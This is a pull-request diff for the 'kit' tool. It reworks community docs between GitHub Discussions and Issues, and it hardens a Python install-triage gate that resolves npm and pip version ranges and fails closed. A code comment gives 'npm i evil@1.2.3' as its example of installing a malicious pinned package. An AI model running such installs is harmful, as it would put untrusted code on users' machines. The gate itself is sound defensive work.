### PR TITLE
security: install-gate + secrets/redaction + control-plane + version-triage hardening (backlog B1–B5)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,7 @@
 node_modules/
 dist/
+__pycache__/
+*.pyc
 .env
 .env.local
 .env.*.local

--- a/COMMUNITY.md
+++ b/COMMUNITY.md
@@ -5,6 +5,7 @@ Welcome to the kit community! This guide covers how to get help, report issues, 
 ## Table of Contents
 
 - [Getting Help](#getting-help)
+- [GitHub Discussions](#github-discussions)
 - [Reporting Issues](#reporting-issues)
 - [Feature Requests](#feature-requests)
 - [Contributing Code](#contributing-code)
@@ -19,11 +20,13 @@ Welcome to the kit community! This guide covers how to get help, report issues, 
 
 **Before asking:**
 1. Check the [documentation](https://github.com/sandstream/kit#readme) and [command reference](docs/COMMANDS.md).
-2. Search existing [GitHub Issues](https://github.com/sandstream/kit/issues) for the same question.
+2. Search [GitHub Discussions](https://github.com/sandstream/kit/discussions) and [Issues](https://github.com/sandstream/kit/issues) for the same question.
 
 **Where to ask:**
-- **Usage questions & troubleshooting:** open a [GitHub Issue](https://github.com/sandstream/kit/issues/new).
-- **Security issues:** see the [Security Policy](SECURITY.md) — **do not** open a public issue for a vulnerability.
+- **Usage questions & troubleshooting:** start a thread in [GitHub Discussions → Q&A](https://github.com/sandstream/kit/discussions/categories/q-a).
+- **Ideas & feedback:** [GitHub Discussions → Ideas](https://github.com/sandstream/kit/discussions/categories/ideas).
+- **Bugs:** open a [GitHub Issue](https://github.com/sandstream/kit/issues/new) (see below).
+- **Security issues:** see the [Security Policy](SECURITY.md) — **do not** open a public issue or discussion for a vulnerability.
 
 ### I found a bug
 
@@ -39,6 +42,22 @@ See the [Bug Report Template](#bug-report-template) below.
 ### I need commercial support
 
 For production support, training, or consulting, contact [hello@sandstre.am](mailto:hello@sandstre.am).
+
+---
+
+## GitHub Discussions
+
+[GitHub Discussions](https://github.com/sandstream/kit/discussions) is the place for
+conversation; [Issues](https://github.com/sandstream/kit/issues) are for tracked bugs and
+feature requests. Categories:
+
+- **Q&A** — usage questions and troubleshooting. Mark the answer that helped.
+- **Ideas** — propose and discuss features before they become issues.
+- **Show and tell** — share what you've built with kit.
+- **General** — anything else that isn't a bug or a concrete feature request.
+
+Please search before posting, include your kit version and OS, and follow the
+[Code of Conduct](CODE_OF_CONDUCT.md).
 
 ---
 
@@ -169,7 +188,8 @@ All community spaces are governed by our [Code of Conduct](CODE_OF_CONDUCT.md).
 
 | Channel | Use For |
 |---------|---------|
-| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests, usage questions |
+| [GitHub Discussions](https://github.com/sandstream/kit/discussions) | Questions, ideas, showcase, general conversation |
+| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests |
 | [Email](mailto:hello@sandstre.am) | Private concerns, security, commercial support |
 
 ---

--- a/COMMUNITY.md
+++ b/COMMUNITY.md
@@ -20,13 +20,13 @@ Welcome to the kit community! This guide helps you get involved, ask questions, 
 
 **Before asking:**
 1. Check [Docs](https://github.com/sandstream/kit) for existing guides
-2. Search [GitHub Discussions](https://github.com/sandstream/kit/discussions) for similar questions
-3. Review [FAQ](https://github.com/sandstream/kit/discussions) and existing [GitHub Issues](https://github.com/sandstream/kit/issues)
+2. Search [GitHub Discussions](https://github.com/sandstream/kit/issues) for similar questions
+3. Review [FAQ](https://github.com/sandstream/kit/issues) and existing [GitHub Issues](https://github.com/sandstream/kit/issues)
 
 **Where to ask:**
-- **General questions:** [GitHub Discussions → Help](https://github.com/sandstream/kit/discussions/categories/help)
-- **Plugin development:** [GitHub Discussions → Plugin Development](https://github.com/sandstream/kit/discussions/categories/plugin-development)
-- **Troubleshooting:** [GitHub Discussions → Troubleshooting](https://github.com/sandstream/kit/discussions/categories/troubleshooting)
+- **General questions:** [GitHub Discussions → Help](https://github.com/sandstream/kit/issues)
+- **Plugin development:** [GitHub Discussions → Plugin Development](https://github.com/sandstream/kit/issues)
+- **Troubleshooting:** [GitHub Discussions → Troubleshooting](https://github.com/sandstream/kit/issues)
 - **Security issues:** Please see [Security Policy](SECURITY.md) — **DO NOT** open a public issue
 
 ### I found a bug
@@ -50,7 +50,7 @@ For production support, training, or consulting:
 
 ## GitHub Discussions
 
-[GitHub Discussions](https://github.com/sandstream/kit/discussions) is our main community forum.
+[GitHub Discussions](https://github.com/sandstream/kit/issues) is our main community forum.
 
 ### Discussion Categories
 
@@ -168,9 +168,9 @@ We use labels to categorize and track issues:
 
 ### How to Request a Feature
 
-1. **Check existing requests** — Search [GitHub Issues](https://github.com/sandstream/kit/issues?q=is%3Aopen+is%3Aissue+label%3Afeature) and [Discussions](https://github.com/sandstream/kit/discussions/categories/feature-requests)
+1. **Check existing requests** — Search [GitHub Issues](https://github.com/sandstream/kit/issues?q=is%3Aopen+is%3Aissue+label%3Afeature) and [Discussions](https://github.com/sandstream/kit/issues)
 
-2. **Post in Discussions first** — Start in [Feature Requests & Ideas](https://github.com/sandstream/kit/discussions/categories/feature-requests) to discuss before creating an issue
+2. **Post in Discussions first** — Start in [Feature Requests & Ideas](https://github.com/sandstream/kit/issues) to discuss before creating an issue
 
 3. **Create an issue** — If there's community interest, create a [Feature Request issue](https://github.com/sandstream/kit/issues/new?labels=feature)
 
@@ -295,12 +295,8 @@ All community spaces are governed by our [Code of Conduct](CODE_OF_CONDUCT.md).
 
 | Channel | Use For | Response Time |
 |---------|---------|----------------|
-| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests | 24-48 hours |
-| [GitHub Discussions](https://github.com/sandstream/kit/discussions) | Questions, ideas, showcase | 24 hours |
+| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests, questions | 24-48 hours |
 | [Email](mailto:hello@sandstre.am) | Private concerns, security | 48 hours |
-| [Twitter](https://twitter.com/kitio) | Announcements, news | N/A |
-| [Discord](https://discord.gg/kit) | Real-time chat, community | Varies |
-| [Slack Community](https://github.com/sandstream/kit) | Private workspace, enterprise | Varies |
 
 ---
 
@@ -310,7 +306,7 @@ All community spaces are governed by our [Code of Conduct](CODE_OF_CONDUCT.md).
 - [Getting Started](docs/GETTING_STARTED_PLUGINS.md)
 - [API Reference](docs/COMMANDS.md)
 - [Plugin Development](docs/PLUGIN_DEVELOPMENT.md)
-- [FAQ](https://github.com/sandstream/kit/discussions)
+- [FAQ](https://github.com/sandstream/kit/issues)
 
 ### Examples
 - [Example Plugins](packages/example-plugins/)
@@ -328,7 +324,7 @@ All community spaces are governed by our [Code of Conduct](CODE_OF_CONDUCT.md).
 
 Have feedback about the community or these guidelines?
 - Open an issue with the `community` label
-- Discuss in [Community Feedback](https://github.com/sandstream/kit/discussions)
+- Discuss in [Community Feedback](https://github.com/sandstream/kit/issues)
 - Email [hello@sandstre.am](mailto:hello@sandstre.am)
 
 We value your input and continuously improve our community experience.

--- a/COMMUNITY.md
+++ b/COMMUNITY.md
@@ -1,16 +1,15 @@
 # Community Guidelines
 
-Welcome to the kit community! This guide helps you get involved, ask questions, contribute, and connect with other members.
+Welcome to the kit community! This guide covers how to get help, report issues, request features, and contribute.
 
 ## Table of Contents
 
 - [Getting Help](#getting-help)
-- [GitHub Discussions](#github-discussions)
 - [Reporting Issues](#reporting-issues)
 - [Feature Requests](#feature-requests)
 - [Contributing Code](#contributing-code)
-- [Community Events](#community-events)
 - [Code of Conduct](#code-of-conduct)
+- [Communication Channels](#communication-channels)
 
 ---
 
@@ -19,91 +18,27 @@ Welcome to the kit community! This guide helps you get involved, ask questions, 
 ### I have a question
 
 **Before asking:**
-1. Check [Docs](https://github.com/sandstream/kit) for existing guides
-2. Search [GitHub Discussions](https://github.com/sandstream/kit/issues) for similar questions
-3. Review [FAQ](https://github.com/sandstream/kit/issues) and existing [GitHub Issues](https://github.com/sandstream/kit/issues)
+1. Check the [documentation](https://github.com/sandstream/kit#readme) and [command reference](docs/COMMANDS.md).
+2. Search existing [GitHub Issues](https://github.com/sandstream/kit/issues) for the same question.
 
 **Where to ask:**
-- **General questions:** [GitHub Discussions → Help](https://github.com/sandstream/kit/issues)
-- **Plugin development:** [GitHub Discussions → Plugin Development](https://github.com/sandstream/kit/issues)
-- **Troubleshooting:** [GitHub Discussions → Troubleshooting](https://github.com/sandstream/kit/issues)
-- **Security issues:** Please see [Security Policy](SECURITY.md) — **DO NOT** open a public issue
+- **Usage questions & troubleshooting:** open a [GitHub Issue](https://github.com/sandstream/kit/issues/new).
+- **Security issues:** see the [Security Policy](SECURITY.md) — **do not** open a public issue for a vulnerability.
 
 ### I found a bug
 
-Please report bugs as GitHub Issues with:
-1. **Title:** Clear, concise description
-2. **Description:** What happened vs. what you expected
-3. **Steps to reproduce:** Exact steps to trigger the bug
-4. **Environment:** kit version, OS, Node.js version
-5. **Logs:** Relevant error messages or debug output
+Please open a [GitHub Issue](https://github.com/sandstream/kit/issues/new) with:
+1. **Title:** clear, concise description.
+2. **Description:** what happened vs. what you expected.
+3. **Steps to reproduce:** exact steps to trigger the bug.
+4. **Environment:** kit version, OS, Node.js version.
+5. **Logs:** relevant error messages or debug output.
 
-See [Bug Report Template](#bug-report-template) below.
+See the [Bug Report Template](#bug-report-template) below.
 
 ### I need commercial support
 
-For production support, training, or consulting:
-- Contact [hello@sandstre.am](mailto:hello@sandstre.am)
-- Visit [kit Enterprise](https://github.com/sandstream/kit)
-
----
-
-## GitHub Discussions
-
-[GitHub Discussions](https://github.com/sandstream/kit/issues) is our main community forum.
-
-### Discussion Categories
-
-#### 📢 Announcements
-- **What:** Major updates, releases, breaking changes
-- **Who can post:** Maintainers and core team
-- **Use:** Stay informed about important kit news
-
-#### 🆘 Help
-- **What:** Questions about using kit
-- **Who can post:** Anyone
-- **Use:** Ask how to do things, troubleshoot issues
-- **Response time:** Usually within 24 hours
-
-#### 🚀 Feature Requests & Ideas
-- **What:** Suggestions for new features
-- **Who can post:** Anyone
-- **Use:** Propose ideas and discuss improvements
-- **Note:** See [Feature Request Process](#feature-requests) for full details
-
-#### 🔧 Plugin Development
-- **What:** Building custom plugins and adapters
-- **Who can post:** Anyone
-- **Use:** Share code, ask for code review, discuss plugin architecture
-- **Related:** [Plugin Development Guide](docs/PLUGIN_DEVELOPMENT.md)
-
-#### 📚 Showcase
-- **What:** Projects using kit, creative use cases
-- **Who can post:** Anyone
-- **Use:** Share what you've built with kit
-
-#### 🐛 Troubleshooting
-- **What:** Debugging help for specific issues
-- **Who can post:** Anyone
-- **Use:** Ask for help resolving problems
-- **Note:** Bug reports should use GitHub Issues (see below)
-
-### Discussion Best Practices
-
-**Do:**
-- ✅ Search for similar discussions first
-- ✅ Use clear titles and descriptions
-- ✅ Include relevant code snippets or error messages
-- ✅ Provide version information and context
-- ✅ Mark helpful replies with reactions (👍)
-- ✅ Follow the [Code of Conduct](CODE_OF_CONDUCT.md)
-
-**Don't:**
-- ❌ Duplicate existing discussions (link to the original instead)
-- ❌ Post the same question across multiple channels
-- ❌ Share API keys, passwords, or sensitive data
-- ❌ Use discussions for bug reports (use Issues instead)
-- ❌ Spam or self-promotion without community value
+For production support, training, or consulting, contact [hello@sandstre.am](mailto:hello@sandstre.am).
 
 ---
 
@@ -116,7 +51,7 @@ For production support, training, or consulting:
 Brief description of the issue
 
 ## Environment
-- kit version: (e.g., 1.0.0)
+- kit version: (e.g., 4.0.0)
 - Node.js version: (e.g., 22.0.0)
 - OS: (e.g., macOS 14.2)
 - npm/yarn version: (e.g., 10.0.0)
@@ -133,22 +68,15 @@ What should happen
 What actually happens
 
 ## Error Messages
-```
 Paste relevant error messages or logs
-```
 
 ## Additional Context
 Any other relevant information
-
-## Reproduction
-- [ ] Issue reproducible on latest version
-- [ ] Reproducible with minimal example
-- [ ] Related to security? (see SECURITY.md if yes)
 ```
 
 ### Issue Labels
 
-We use labels to categorize and track issues:
+Common labels used to categorize and track issues:
 
 | Label | Meaning |
 |-------|---------|
@@ -159,8 +87,6 @@ We use labels to categorize and track issues:
 | `performance` | Performance improvement needed |
 | `good first issue` | Good for new contributors |
 | `help wanted` | Maintainers seeking community help |
-| `in progress` | Currently being worked on |
-| `blocked` | Waiting on external dependency |
 
 ---
 
@@ -168,11 +94,8 @@ We use labels to categorize and track issues:
 
 ### How to Request a Feature
 
-1. **Check existing requests** — Search [GitHub Issues](https://github.com/sandstream/kit/issues?q=is%3Aopen+is%3Aissue+label%3Afeature) and [Discussions](https://github.com/sandstream/kit/issues)
-
-2. **Post in Discussions first** — Start in [Feature Requests & Ideas](https://github.com/sandstream/kit/issues) to discuss before creating an issue
-
-3. **Create an issue** — If there's community interest, create a [Feature Request issue](https://github.com/sandstream/kit/issues/new?labels=feature)
+1. **Check existing requests** — search [open feature issues](https://github.com/sandstream/kit/issues?q=is%3Aopen+is%3Aissue+label%3Afeature).
+2. **Open an issue** — file a [feature request](https://github.com/sandstream/kit/issues/new?labels=feature) describing the problem it solves.
 
 ### Feature Request Template
 
@@ -196,31 +119,16 @@ Other approaches or existing workarounds
 Any technical considerations or constraints
 ```
 
-### Feature Priority Factors
-
-We prioritize features based on:
-- **Community demand** — How many people have requested it?
-- **Alignment with roadmap** — Does it fit our product direction?
-- **Complexity** — How much effort would it require?
-- **Impact** — How many users would benefit?
-- **Maintainability** — Can we support it long-term?
-
 ---
 
 ## Contributing Code
 
-Ready to contribute? Awesome! See [CONTRIBUTING.md](CONTRIBUTING.md) for:
-- Setup instructions
-- Development workflow
-- Testing requirements
-- Pull request process
-- Code style guidelines
-- Commit message conventions
+Ready to contribute? See [CONTRIBUTING.md](CONTRIBUTING.md) for setup, development workflow, testing requirements, the pull-request process, code style, and commit conventions.
 
 ### Quick Start
 
 ```bash
-# Fork the repository and clone
+# Fork the repository and clone your fork
 git clone https://github.com/YOUR_USERNAME/kit.git
 cd kit
 
@@ -233,48 +141,17 @@ git checkout -b feat/your-feature-name
 # Make changes, commit, and push
 git push origin feat/your-feature-name
 
-# Open a pull request
-# See CONTRIBUTING.md for checklist
+# Open a pull request (see CONTRIBUTING.md for the checklist)
 ```
 
 ### Types of Contributions We Welcome
 
-- **Code** — Bug fixes, features, refactoring
-- **Tests** — Improved test coverage, edge cases
-- **Documentation** — Guides, examples, clarifications
-- **Translations** — Localizing docs to other languages
-- **Design** — UI/UX improvements (screenshots, mockups)
-- **Community** — Helping in discussions, mentoring others
+- **Code** — bug fixes, features, refactoring
+- **Tests** — improved coverage, edge cases
+- **Documentation** — guides, examples, clarifications
+- **Adapters & plugins** — support for more tools and ecosystems
 
-### Recognition
-
-Contributors are recognized in:
-- [CHANGELOG.md](CHANGELOG.md) for releases
-- [GitHub Contributors](https://github.com/sandstream/kit/graphs/contributors) page
-- Project README.md
-- Monthly community digest (if applicable)
-
----
-
-## Community Events
-
-### Upcoming Events
-
-- **Weekly Office Hours** — Tuesdays 10am UTC on [Zoom](https://github.com/sandstream/kit)
-- **Monthly Community Call** — Third Friday at 3pm UTC
-- **Quarterly Roadmap Review** — All-hands review of upcoming work
-
-### How to Join
-
-- Add to calendar: [kit Calendar](https://github.com/sandstream/kit)
-- Watch repository for announcements
-- Subscribe to [Newsletter](https://github.com/sandstream/kit)
-
-### Organizing Events
-
-Want to organize a kit meetup, workshop, or talk? 
-- Email [hello@sandstre.am](mailto:hello@sandstre.am)
-- We provide swag, promotional support, and discounts
+Contributors are credited in [CHANGELOG.md](CHANGELOG.md) and on the [GitHub Contributors](https://github.com/sandstream/kit/graphs/contributors) page.
 
 ---
 
@@ -282,57 +159,19 @@ Want to organize a kit meetup, workshop, or talk?
 
 All community spaces are governed by our [Code of Conduct](CODE_OF_CONDUCT.md).
 
-### Key Points
-
-- Treat everyone with respect
-- Harassment and discrimination are not tolerated
-- Report violations to [hello@sandstre.am](mailto:hello@sandstre.am)
-- We take enforcement seriously
+- Treat everyone with respect.
+- Harassment and discrimination are not tolerated.
+- Report violations to [hello@sandstre.am](mailto:hello@sandstre.am).
 
 ---
 
 ## Communication Channels
 
-| Channel | Use For | Response Time |
-|---------|---------|----------------|
-| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests, questions | 24-48 hours |
-| [Email](mailto:hello@sandstre.am) | Private concerns, security | 48 hours |
+| Channel | Use For |
+|---------|---------|
+| [GitHub Issues](https://github.com/sandstream/kit/issues) | Bug reports, feature requests, usage questions |
+| [Email](mailto:hello@sandstre.am) | Private concerns, security, commercial support |
 
 ---
-
-## Resources
-
-### Documentation
-- [Getting Started](docs/GETTING_STARTED_PLUGINS.md)
-- [API Reference](docs/COMMANDS.md)
-- [Plugin Development](docs/PLUGIN_DEVELOPMENT.md)
-- [FAQ](https://github.com/sandstream/kit/issues)
-
-### Examples
-- [Example Plugins](packages/example-plugins/)
-- [Sample Projects](docs/examples/)
-- [Blog Posts](https://github.com/sandstream/kit)
-
-### Learning
-- [Video Tutorials](https://youtube.com/@kitio)
-- [Blog](https://github.com/sandstream/kit)
-- [Webinars](https://github.com/sandstream/kit)
-
----
-
-## Feedback & Suggestions
-
-Have feedback about the community or these guidelines?
-- Open an issue with the `community` label
-- Discuss in [Community Feedback](https://github.com/sandstream/kit/issues)
-- Email [hello@sandstre.am](mailto:hello@sandstre.am)
-
-We value your input and continuously improve our community experience.
-
----
-
-**Version:** 1.0  
-**Adopted:** 2026-04-16  
-**Last Updated:** 2026-04-16
 
 **Welcome to the kit community! 🚀**

--- a/README.md
+++ b/README.md
@@ -897,7 +897,7 @@ For Cline, add the same config to your `cline_mcp_settings.json`.
 ### Getting Help
 
 - 📚 **Plugin Development**: [docs/PLUGIN_DEVELOPMENT.md](docs/PLUGIN_DEVELOPMENT.md), [docs/ADAPTER_GUIDE.md](docs/ADAPTER_GUIDE.md), [docs/MCP_TOOLS_GUIDE.md](docs/MCP_TOOLS_GUIDE.md)
-- 💬 **Discussions**: [github.com/sandstream/kit/discussions](https://github.com/sandstream/kit/discussions)
+- 💬 **Discussions**: [github.com/sandstream/kit/discussions](https://github.com/sandstream/kit/issues)
 - 🐛 **Issues**: [github.com/sandstream/kit/issues](https://github.com/sandstream/kit/issues)
 - 🤝 **Contributing**: [CONTRIBUTING.md](CONTRIBUTING.md), [COMMUNITY.md](COMMUNITY.md)
 

--- a/skills/triage/scripts/triage.py
+++ b/skills/triage/scripts/triage.py
@@ -169,32 +169,45 @@ def _resolve_npm_spec(spec, version_keys):
     for p in spec.split("."):
         if p in ("x", "X", "*", ""):
             break
-        if not p.isdigit():
-            return None
+        if not p.isdigit() or len(p) > 18:
+            return None  # non-numeric or absurdly long component (avoid int() blowups)
         nums.append(int(p))
+    if len(nums) > 3 or (op and not nums):
+        return None  # not a 3-part semver / an operator with no version → don't guess
     base = tuple((nums + [0, 0, 0])[:3])
+
+    def bump_partial():
+        # x-range upper bound of a PARTIAL version: <=1 → 2.0.0, <=1.2 → 1.3.0, >1 → 2.0.0
+        b = list(base)
+        b[len(nums) - 1] += 1
+        for j in range(len(nums), 3):
+            b[j] = 0
+        return tuple(b)
 
     def satisfies(t):
         if op == "^" and nums:
-            if base[0] > 0:
-                return base <= t < (base[0] + 1, 0, 0)
-            if len(nums) >= 2 and base[1] > 0:
-                return base <= t < (0, base[1] + 1, 0)
-            return base <= t < (base[0], base[1], base[2] + 1)
+            # npm caret: bump the leftmost NON-ZERO component (or the last specified when all
+            # are zero), zeroing the rest. ^1.2.3<2.0.0, ^0.2.3<0.3.0, ^0.0.3<0.0.4, ^0.0<0.1.0.
+            idx = next((i for i, n in enumerate(nums) if n > 0), len(nums) - 1)
+            hi = list(base)
+            hi[idx] += 1
+            for j in range(idx + 1, 3):
+                hi[j] = 0
+            return base <= t < tuple(hi)
         if op == "~" and nums:
             hi = (base[0], base[1] + 1, 0) if len(nums) >= 2 else (base[0] + 1, 0, 0)
             return base <= t < hi
         if op == ">=":
             return t >= base
-        if op == ">":
-            return t > base
-        if op == "<=":
-            return t <= base
         if op == "<":
             return t < base
+        if op == "<=":  # partial <= desugars to an x-range bound (<=1 → <2.0.0)
+            return t <= base if len(nums) >= 3 else t < bump_partial()
+        if op == ">":  # partial > desugars likewise (>1 → >=2.0.0)
+            return t > base if len(nums) >= 3 else t >= bump_partial()
         if op == "=":
             return t == base
-        return all(t[i] == n for i, n in enumerate(nums))  # bare partial: 1 → 1.x.x
+        return all(i < len(t) and t[i] == n for i, n in enumerate(nums))  # bare partial: 1 → 1.x.x
 
     cands = sorted(t for t in (_stable_semver(v) for v in version_keys) if t and satisfies(t))
     if not cands:
@@ -274,7 +287,12 @@ def _split_pip_spec(target):
 def _pep_release(v):
     """Numeric release tuple of a PEP 440 version (epoch/pre/post/dev ignored), else None."""
     m = re.match(r"^(?:\d+!)?(\d+(?:\.\d+)*)", v)
-    return tuple(int(x) for x in m.group(1).split(".")) if m else None
+    if not m:
+        return None
+    parts = m.group(1).split(".")
+    if any(len(p) > 18 for p in parts):  # avoid int() blowups on absurd input
+        return None
+    return tuple(int(x) for x in parts)
 
 
 def _pep_stable(v):
@@ -296,8 +314,13 @@ def _resolve_pip_spec(spec, release_keys):
     if op in ("==", "==="):
         if op == "==" and ver.endswith(".*"):
             pref = ver[:-2]
+            # STABLE releases only — pip excludes pre-releases from `==X.*` without --pre.
             cands = sorted(
-                (r for r in release_keys if r == pref or r.startswith(pref + ".")),
+                (
+                    r
+                    for r in release_keys
+                    if _pep_stable(r) and (r == pref or r.startswith(pref + "."))
+                ),
                 key=lambda r: _pep_release(r) or (),
             )
             return cands[-1] if cands else None
@@ -307,18 +330,23 @@ def _resolve_pip_spec(spec, release_keys):
         return None
 
     def ok(t):
+        # Compare zero-padded to equal length: PEP 440 treats 2.20 == 2.20.0, so a bare
+        # `<=2.20` must include 2.20.0 (Python tuple compare would otherwise exclude it).
+        n = max(len(t), len(want))
+        tt = tuple(t) + (0,) * (n - len(t))
+        ww = tuple(want) + (0,) * (n - len(want))
         if op == ">=":
-            return t >= want
+            return tt >= ww
         if op == ">":
-            return t > want
+            return tt > ww
         if op == "<=":
-            return t <= want
+            return tt <= ww
         if op == "<":
-            return t < want
+            return tt < ww
         if op == "!=":
-            return t != want
-        if op == "~=" and len(want) >= 2:  # compatible release
-            return t >= want and t[: len(want) - 1] == want[: len(want) - 1]
+            return tt != ww
+        if op == "~=" and len(want) >= 2:  # compatible release: >= want, same prefix minus last
+            return tt >= ww and t[: len(want) - 1] == want[: len(want) - 1]
         return False
 
     cands = sorted(
@@ -504,7 +532,13 @@ def main(argv):
     if not fn:
         rep.critical(f"unknown triage type '{ttype}'")
     else:
-        fn(rep)
+        # Fail CLOSED on any unexpected error: an escaping exception would skip rep.emit()
+        # entirely (no verdict line → kit can't see a PASS, but also no explicit block). Turn
+        # it into a CRITICAL so the gate always renders a decisive, safe verdict.
+        try:
+            fn(rep)
+        except Exception as e:  # noqa: BLE001 -- deliberate catch-all for a fail-closed gate
+            rep.critical(f"triage error ({type(e).__name__}) -- cannot verify")
     rep.emit()
     return 0
 

--- a/skills/triage/scripts/triage.py
+++ b/skills/triage/scripts/triage.py
@@ -138,6 +138,71 @@ def _split_npm_spec(target):
     return target, None
 
 
+def _stable_semver(v):
+    """(major, minor, patch) for a STABLE X.Y.Z (no pre-release/build), else None."""
+    m = re.match(r"^(\d+)\.(\d+)\.(\d+)$", v)
+    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None
+
+
+def _resolve_npm_spec(spec, version_keys):
+    """Resolve a npm version spec to the concrete published version npm WOULD install — the
+    MAX stable version satisfying it — or None if we can't parse it (→ caller fails closed).
+    A leading `v` is tolerated (npm loose-parses it). Handles exact, `X`/`X.Y`/`X.x` partials,
+    `^`, `~`, and single comparators (`>=`, `>`, `<`, `<=`, `=`). Compound/hyphen/`||` ranges
+    return None (fail-closed) — they're rare in a CLI install and must not silently pass latest.
+    """
+    spec = spec.strip()
+    if spec[1:2].isdigit() and spec[:1] == "v":
+        spec = spec[1:]  # npm tolerates a leading v (v1.2.3 == 1.2.3)
+    if spec in version_keys:
+        return spec  # exact
+    if any(c in spec for c in (" ", "||", " - ", ",")):
+        return None  # compound/hyphen range — don't guess
+    op = ""
+    for o in (">=", "<=", "^", "~", ">", "<", "="):
+        if spec.startswith(o):
+            op, spec = o, spec[len(o):].strip()
+            break
+    if spec.startswith("v") and spec[1:2].isdigit():
+        spec = spec[1:]
+    nums = []
+    for p in spec.split("."):
+        if p in ("x", "X", "*", ""):
+            break
+        if not p.isdigit():
+            return None
+        nums.append(int(p))
+    base = tuple((nums + [0, 0, 0])[:3])
+
+    def satisfies(t):
+        if op == "^" and nums:
+            if base[0] > 0:
+                return base <= t < (base[0] + 1, 0, 0)
+            if len(nums) >= 2 and base[1] > 0:
+                return base <= t < (0, base[1] + 1, 0)
+            return base <= t < (base[0], base[1], base[2] + 1)
+        if op == "~" and nums:
+            hi = (base[0], base[1] + 1, 0) if len(nums) >= 2 else (base[0] + 1, 0, 0)
+            return base <= t < hi
+        if op == ">=":
+            return t >= base
+        if op == ">":
+            return t > base
+        if op == "<=":
+            return t <= base
+        if op == "<":
+            return t < base
+        if op == "=":
+            return t == base
+        return all(t[i] == n for i, n in enumerate(nums))  # bare partial: 1 → 1.x.x
+
+    cands = sorted(t for t in (_stable_semver(v) for v in version_keys) if t and satisfies(t))
+    if not cands:
+        return None
+    best = cands[-1]
+    return f"{best[0]}.{best[1]}.{best[2]}"
+
+
 def triage_npm(rep):
     pkg, spec = _split_npm_spec(rep.target)
     url = f"{NPM_REGISTRY}/{urllib.parse.quote(pkg, safe='@/')}"
@@ -158,21 +223,24 @@ def triage_npm(rep):
     times = data.get("time") or {}
     latest = dist_tags.get("latest")
 
-    # Resolve WHICH version to inspect for deprecation/existence. A pinned exact version
-    # or dist-tag is checked directly -- a clean `latest` must never vouch for a yanked or
-    # malicious pinned version (`npm i evil@1.2.3`). A range we can't resolve deterministically
-    # (no semver here) falls back to latest with a note.
+    # Resolve WHICH version to inspect for deprecation/existence. A dist-tag, an exact pin, or
+    # a range/partial (`@2`, `@^1.2`, `@1.x`, `@v1.2.3`) is resolved to the concrete version npm
+    # WOULD install -- a clean `latest` must never vouch for a yanked/deprecated/malicious pinned
+    # or in-range version. An unresolvable spec fails CLOSED (never silently passes latest).
     target_ver = latest
     if spec:
         if spec in dist_tags:
             target_ver = dist_tags[spec]
-        elif spec in versions:
-            target_ver = spec
-        elif re.match(r"^[0-9]+\.[0-9]+", spec):
-            rep.critical(f"pinned version '{spec}' of '{pkg}' not found (yanked/unpublished)")
-            return
         else:
-            rep.warn(f"version spec '{spec}' is a range -- triaged latest ({latest}) instead")
+            resolved = _resolve_npm_spec(spec, list(versions.keys()))
+            if resolved:
+                target_ver = resolved
+            else:
+                rep.critical(
+                    f"version spec '{spec}' of '{pkg}' could not be resolved to a published "
+                    f"version (yanked/unpublished/unsupported range) -- cannot verify"
+                )
+                return
 
     meta = versions.get(target_ver, {}) if target_ver else {}
     if meta.get("deprecated"):
@@ -203,6 +271,63 @@ def _split_pip_spec(target):
     return m.group(1), (spec or None)
 
 
+def _pep_release(v):
+    """Numeric release tuple of a PEP 440 version (epoch/pre/post/dev ignored), else None."""
+    m = re.match(r"^(?:\d+!)?(\d+(?:\.\d+)*)", v)
+    return tuple(int(x) for x in m.group(1).split(".")) if m else None
+
+
+def _pep_stable(v):
+    """True for a plain release version (no a/b/rc/dev/post pre-release suffix)."""
+    return re.match(r"^(?:\d+!)?\d+(?:\.\d+)*$", v) is not None
+
+
+def _resolve_pip_spec(spec, release_keys):
+    """Resolve a single pip version spec to the concrete release pip WOULD install (max
+    satisfying), or None if unparseable/compound (→ caller fails closed). Handles
+    `==`/`===`/`==X.*`, `>=`,`>`,`<`,`<=`,`!=`,`~=`. Compound (`,`) ranges return None."""
+    spec = spec.strip()
+    if "," in spec:
+        return None
+    m = re.match(r"^(===|==|~=|>=|<=|!=|>|<)\s*([0-9][\w.*!+-]*)$", spec)
+    if not m:
+        return None
+    op, ver = m.group(1), m.group(2)
+    if op in ("==", "==="):
+        if op == "==" and ver.endswith(".*"):
+            pref = ver[:-2]
+            cands = sorted(
+                (r for r in release_keys if r == pref or r.startswith(pref + ".")),
+                key=lambda r: _pep_release(r) or (),
+            )
+            return cands[-1] if cands else None
+        return ver if ver in release_keys else None
+    want = _pep_release(ver)
+    if want is None:
+        return None
+
+    def ok(t):
+        if op == ">=":
+            return t >= want
+        if op == ">":
+            return t > want
+        if op == "<=":
+            return t <= want
+        if op == "<":
+            return t < want
+        if op == "!=":
+            return t != want
+        if op == "~=" and len(want) >= 2:  # compatible release
+            return t >= want and t[: len(want) - 1] == want[: len(want) - 1]
+        return False
+
+    cands = sorted(
+        (r for r in release_keys if _pep_stable(r) and _pep_release(r) and ok(_pep_release(r))),
+        key=lambda r: _pep_release(r),
+    )
+    return cands[-1] if cands else None
+
+
 def triage_pip(rep):
     pkg, spec = _split_pip_spec(rep.target)
     url = f"{PYPI_INDEX}/pypi/{urllib.parse.quote(pkg)}/json"
@@ -222,18 +347,20 @@ def triage_pip(rep):
     releases = data.get("releases") or {}
     latest = info.get("version")
 
-    # An exact `==` pin is checked directly: a clean latest must not vouch for a yanked or
-    # unpublished pinned version. A range (no resolver here) falls back to latest with a note.
+    # A pin or range is resolved to the concrete release pip WOULD install (max satisfying) and
+    # checked directly -- a clean latest must not vouch for a yanked/older in-range version. An
+    # unresolvable/compound spec fails CLOSED rather than silently passing latest.
     ver = latest
-    if spec and spec.startswith("=="):
-        pin = spec[2:].strip()
-        if pin in releases:
-            ver = pin
+    if spec:
+        resolved = _resolve_pip_spec(spec, list(releases.keys()))
+        if resolved:
+            ver = resolved
         else:
-            rep.critical(f"pinned version '{pin}' of '{pkg}' not found (yanked/unpublished)")
+            rep.critical(
